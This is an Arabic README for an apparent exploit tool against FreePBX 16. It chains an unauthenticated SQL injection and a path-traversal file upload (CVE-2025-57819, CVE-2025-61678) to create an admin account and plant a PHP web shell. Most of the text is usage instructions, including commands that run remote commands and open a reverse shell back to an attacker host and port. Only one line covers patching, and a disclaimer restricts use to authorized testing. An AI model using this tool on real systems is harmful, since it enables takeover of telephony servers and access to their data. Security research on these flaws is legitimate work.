
سلسلة استغلال حقن SQL غير المصادق عليه ورفع الملفات التعسفية لـ FreePBX 16، مما يحقق تنفيذ التعليمات البرمجية عن بعد عبر إنشاء مسؤول ونشر قشرة ويب.
| CVE | المكون | التأثير |
|---|
| CVE-2025-57819 | مُحمّل وحدة النقاط الطرفية (مُعامِل brand) | حقن SQL مُكدّس غير مصادق عليه |
| CVE-2025-61678 | رافع البرامج الثابتة لمدير النقاط الطرفية (مُعامِل fwbrand) | رفع ملف تعسفي مصادق عليه (تجاوز المسار) |
ampusers.../../../var/www/html/<dir> في fwbrand لكتابة شِلّة PHP في جذر الويب.FreePBX 16 (وحدة النقاط الطرفية قبل الإصدار 16.0.92). تم التصحيح أيضًا في 17.0.6.
قم بالتحديث إلى إصدار تم إصلاحه.
# single command
python3 exploit.py --rhost pbx.example.com --command "id"
# interactive reverse shell (auto-listener via pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# plain HTTP / custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| العَلَمة | الوصف |
|---|---|
--rhost | الخادم الهدف (مطلوب) |
--rport | منفذ الهدف (افتراضي 443) |
--http | استخدام HTTP بدلاً من HTTPS |
--lhost / --lport | عنوان ردّ شِلّة عكسية |
--command | تشغيل أمر واحد بدلاً من شِلّة |
pip install requests pwntools
للاستخدام في الاختبارات الأمنية المصرح بها والأغراض التعليمية فقط. استخدمه حصريًا على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
FreePBX · FreePBX 16 · FreePBX 16.0.40.7 · Sangoma PBX · Asterisk · CVE-2025-57819 · CVE-2025-61678 · حقن SQL غير مصادق عليه · حقن استعلامات مُكدّسة · وحدة النقاط الطرفية · مدير النقاط الطرفية · رفع ملفات مصادق عليه · تجاوز المسار · تنفيذ أوامر عن بُعد · RCE · PoC · استغلال · أمن VoIP
linkedin: ehxb · medium.com/@Ehxb · github 0xEhxb